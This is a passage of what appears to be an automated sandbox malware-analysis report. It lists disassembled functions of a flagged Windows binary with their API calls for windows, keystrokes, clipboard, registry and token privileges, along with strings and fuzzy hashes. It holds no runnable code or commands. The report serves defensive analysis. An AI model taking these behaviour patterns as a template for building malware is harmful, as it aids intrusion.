                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction ID: 54902b93528b87b659f4caceff0803e9e4d065a73cd747424abd7c20d63ed2fd
                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                              • Instruction Fuzzy Hash: F5B092B684020C7BEE012E86EC02A593F19AB45678F808020FB0C18562A673A6A0968E
                              Function 008ED2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.KERNEL32(00000002,00000000), ref: 008ED46A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: 1fd4c31e9805e92fc5a587dc3ab616abc1beb6e2f980fa2033f826362636e4ec
                              • Instruction ID: c2085e53de23332a74bb611ff7c4bec1c1d4c14e9a0cdd2606ca3bec4b80fe5e
                              • Opcode Fuzzy Hash: 1fd4c31e9805e92fc5a587dc3ab616abc1beb6e2f980fa2033f826362636e4ec
                              • Instruction Fuzzy Hash: 67714D342043418FC714EF29C491A6AB7E0FF99714F18496DF996DB2A2DB30ED49CB52
                              Function 008A0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 1dc9fdbf08c2d9f326ae3044a1ab10a9bfaaa91819811b2a15476d27f519fb32
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8231C270A00109DFEB18DF58D480969F7A6FF5A304B648AA5E409DBA51DB31EDE1EF80
                              Function 0110229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 011022B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction ID: f931c5b8dc9d55cedd3edb9f854ec474835180145e5cfe28180d0571506d2fd7
                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction Fuzzy Hash: 73E09A7494010EAFDB00EFE4D54969E7BB4EF04311F1005A1FD0597681DB709A548A62
                              Function 011022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 011022B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: c209ea3b4fa66068eb840c2828d35899acafba7577eeb4e41c8624a87a828362
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 33E0BF7494010E9FDB00EFE4D54969E7BB4EF04301F100161FD0592281D77099508A62

                              Non-executed Functions

                              Function 0090CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0090CE50
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CE91
                              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0090CED6
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CF00
                              • SendMessageW.USER32 ref: 0090CF29
                              • _wcsncpy.LIBCMT ref: 0090CFA1
                              • GetKeyState.USER32(00000011), ref: 0090CFC2
                              • GetKeyState.USER32(00000009), ref: 0090CFCF
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CFE5
                              • GetKeyState.USER32(00000010), ref: 0090CFEF
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090D018
                              • SendMessageW.USER32 ref: 0090D03F
                              • SendMessageW.USER32(?,00001030,?,0090B602), ref: 0090D145
                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0090D15B
                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0090D16E
                              • SetCapture.USER32(?), ref: 0090D177
                              • ClientToScreen.USER32(?,?), ref: 0090D1DC
                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0090D1E9
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0090D203
                              • ReleaseCapture.USER32 ref: 0090D20E
                              • GetCursorPos.USER32(?), ref: 0090D248
                              • ScreenToClient.USER32(?,?), ref: 0090D255
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D2B1
                              • SendMessageW.USER32 ref: 0090D2DF
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D31C
                              • SendMessageW.USER32 ref: 0090D34B
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D36C
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D37B
                              • GetCursorPos.USER32(?), ref: 0090D39B
                              • ScreenToClient.USER32(?,?), ref: 0090D3A8
                              • GetParent.USER32(?), ref: 0090D3C8
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D431
                              • SendMessageW.USER32 ref: 0090D462
                              • ClientToScreen.USER32(?,?), ref: 0090D4C0
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D4F0
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D51A
                              • SendMessageW.USER32 ref: 0090D53D
                              • ClientToScreen.USER32(?,?), ref: 0090D58F
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D5C3
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090D65F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3977979337-4164748364
                              • Opcode ID: da8babe1136a6eaece14ba470a6512429ebeeb45744e49f8d6cb6b95607bff69
                              • Instruction ID: ef9134f9abb4c47caf73846163af60fb6fa9c83f9293f07a489f6efe115eb17b
                              • Opcode Fuzzy Hash: da8babe1136a6eaece14ba470a6512429ebeeb45744e49f8d6cb6b95607bff69
                              • Instruction Fuzzy Hash: 5942ABB4208341AFD725CF68C858EAABBE9FF49314F14061DF699972E0C731AD41DB92
                              Function 0090804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0090873F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: %d/%02d/%02d
                              • API String ID: 3850602802-328681919
                              • Opcode ID: 89836121b4f0f278d0aea76d2d7a654b6dc62f67e22583b3ec1888cff907bd86
                              • Instruction ID: eafe5ce91a01892d6a5014e01d999a71ab0cd322ca33a3fdee66eb834fb81bd6
                              • Opcode Fuzzy Hash: 89836121b4f0f278d0aea76d2d7a654b6dc62f67e22583b3ec1888cff907bd86
                              • Instruction Fuzzy Hash: 6512BD71604208AFEB258F28CC49FAF7BB8EF49710F204569F995EA2E1DF748941DB10
                              Function 0089710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove$_memset
                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                              • API String ID: 1357608183-1798697756
                              • Opcode ID: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                              • Instruction ID: 66eb76c487330a0750d50357f48e998a98601f9afd1ad1088e9db0f26489ab5b
                              • Opcode Fuzzy Hash: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                              • Instruction Fuzzy Hash: 6B938171A04219DBDF24DF58D881BADB7B1FF58714F24826AE955EB380E7709E81CB40
                              Function 00884A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32(00000000,?), ref: 00884A3D
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BDA8E
                              • IsIconic.USER32(?), ref: 008BDA97
                              • ShowWindow.USER32(?,00000009), ref: 008BDAA4
                              • SetForegroundWindow.USER32(?), ref: 008BDAAE
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BDAC4
                              • GetCurrentThreadId.KERNEL32 ref: 008BDACB
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BDAD7
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAE8
                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAF0
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BDAF8
                              • SetForegroundWindow.USER32(?), ref: 008BDAFB
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB10
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB1B
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB25
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB2A
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB33
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB38
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB42
                              • keybd_event.USER32(00000012,00000000), ref: 008BDB47
                              • SetForegroundWindow.USER32(?), ref: 008BDB4A
                              • AttachThreadInput.USER32(?,?,00000000), ref: 008BDB71
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 4125248594-2988720461
                              • Opcode ID: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                              • Instruction ID: 88758fc1e951f05b0a54820d3ea046e072891ba15a1df00319ae1a61bd539efd
                              • Opcode Fuzzy Hash: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                              • Instruction Fuzzy Hash: FF317371A5431CBFEB316FA19C49FBE7E6CEB44B60F114025FA04EA1D1D6B15A00BBA0
                              Function 008D8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                              • _memset.LIBCMT ref: 008D889B
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D88ED
                              • CloseHandle.KERNEL32(?), ref: 008D88FE
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D8915
                              • GetProcessWindowStation.USER32 ref: 008D892E
                              • SetProcessWindowStation.USER32(00000000), ref: 008D8938
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D8952
                                • Part of subcall function 008D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                • Part of subcall function 008D8713: CloseHandle.KERNEL32(?,?,008D8851), ref: 008D873A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                              • String ID: $default$winsta0
                              • API String ID: 2063423040-1027155976
                              • Opcode ID: e29d2cd7a66cfe1f0a70739a7502b03307366bd56de70b6dc8dbefc2671a10c0
                              • Instruction ID: 3d4f9b3e4906a60fd7efaa56eee893e41fefb9867025554157500de6ccc69ab5
                              • Opcode Fuzzy Hash: e29d2cd7a66cfe1f0a70739a7502b03307366bd56de70b6dc8dbefc2671a10c0
                              • Instruction Fuzzy Hash: D5814A71900219EFDF21DFA4DC45AEEBBB8FF04314F08426AF910E6261DB718E149B62
                              Function 008F425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(0090F910), ref: 008F4284
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 008F4292
                              • GetClipboardData.USER32(0000000D), ref: 008F429A
                              • CloseClipboard.USER32 ref: 008F42A6
                              • GlobalLock.KERNEL32(00000000), ref: 008F42C2
                              • CloseClipboard.USER32 ref: 008F42CC
                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 008F42E1
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 008F42EE
                              • GetClipboardData.USER32(00000001), ref: 008F42F6
                              • GlobalLock.KERNEL32(00000000), ref: 008F4303
                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 008F4337
                              • CloseClipboard.USER32 ref: 008F4447
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                              • String ID:
                              • API String ID: 3222323430-0
                              • Opcode ID: 107f6275f348b8cdb9257e184f07272f825cfb545d5268c135344c996b23125d
                              • Instruction ID: bf2fcffdc5052a9779fd581b26f62b7a30598ec8c738f331654d52c77ba4e19b
                              • Opcode Fuzzy Hash: 107f6275f348b8cdb9257e184f07272f825cfb545d5268c135344c996b23125d
                              • Instruction Fuzzy Hash: FC518E35208209AFD310FB68DC95F7F77A8FF84B10F10452AF696D22A1DB71DA059B62
                              Function 008EC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 008EC9F8
                              • FindClose.KERNEL32(00000000), ref: 008ECA4C
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA71
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA88
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 008ECAAF
                              • __swprintf.LIBCMT ref: 008ECAFB
                              • __swprintf.LIBCMT ref: 008ECB3E
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                              • __swprintf.LIBCMT ref: 008ECB92
                                • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                              • __swprintf.LIBCMT ref: 008ECBE0
                                • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A3953
                                • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A396B
                              • __swprintf.LIBCMT ref: 008ECC2F
                              • __swprintf.LIBCMT ref: 008ECC7E
                              • __swprintf.LIBCMT ref: 008ECCCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 3953360268-2428617273
                              • Opcode ID: b469574daabcb05dd4b422828e3e6a332d8514693bfba33af3dc91cd06f0dd7f
                              • Instruction ID: 789289d480e1ba0fc53c9a73f44b0f035655bfa318f50eb65e0170084dfa0b95
                              • Opcode Fuzzy Hash: b469574daabcb05dd4b422828e3e6a332d8514693bfba33af3dc91cd06f0dd7f
                              • Instruction Fuzzy Hash: 6FA13AB2508314ABC714FBA8C885DAFB7ECFF94704F440929F586C2191EA34DA09CB63
                              Function 008EF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF221
                              • _wcscmp.LIBCMT ref: 008EF236
                              • _wcscmp.LIBCMT ref: 008EF24D
                              • GetFileAttributesW.KERNEL32(?), ref: 008EF25F
                              • SetFileAttributesW.KERNEL32(?,?), ref: 008EF279
                              • FindNextFileW.KERNEL32(00000000,?), ref: 008EF291
                              • FindClose.KERNEL32(00000000), ref: 008EF29C
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF2B8
                              • _wcscmp.LIBCMT ref: 008EF2DF
                              • _wcscmp.LIBCMT ref: 008EF2F6
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF308
                              • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF326
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF330
                              • FindClose.KERNEL32(00000000), ref: 008EF33D
                              • FindClose.KERNEL32(00000000), ref: 008EF34F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1803514871-438819550
                              • Opcode ID: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                              • Instruction ID: 37daaf446db4afe04e9dcbe9cc1cc04075d321c273b6ba6a10aacc15858e4473
                              • Opcode Fuzzy Hash: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                              • Instruction Fuzzy Hash: 5931AE766002596EDB20DBA5DC58ADE73ACEF4A360F100176FA14D31A1EB30DB85DB50
                              Function 00900AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900BDE
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 00900C4C
                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900C94
                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900D1D
                              • RegCloseKey.ADVAPI32(?), ref: 0090103D
                              • RegCloseKey.ADVAPI32(00000000), ref: 0090104A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$ConnectCreateRegistryValue
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 536824911-966354055
                              • Opcode ID: d21a389a2b6b93033274c48e88ae44642a5e896c34de4c0ef3d78d90b6d60c8c
                              • Instruction ID: 9ef861fed063fc2d2941af8b2f10d08323f04c67732c5a71f738cccc23cd2a92
                              • Opcode Fuzzy Hash: d21a389a2b6b93033274c48e88ae44642a5e896c34de4c0ef3d78d90b6d60c8c
                              • Instruction Fuzzy Hash: FD023B752046119FDB14EF18C891E2ABBE5FF89714F04885DF98ADB6A2CB34ED41CB42
                              Function 008EF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008EF37E
                              • _wcscmp.LIBCMT ref: 008EF393
                              • _wcscmp.LIBCMT ref: 008EF3AA
                                • Part of subcall function 008E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E45DC
                              • FindNextFileW.KERNEL32(00000000,?), ref: 008EF3D9
                              • FindClose.KERNEL32(00000000), ref: 008EF3E4
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF400
                              • _wcscmp.LIBCMT ref: 008EF427
                              • _wcscmp.LIBCMT ref: 008EF43E
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF450
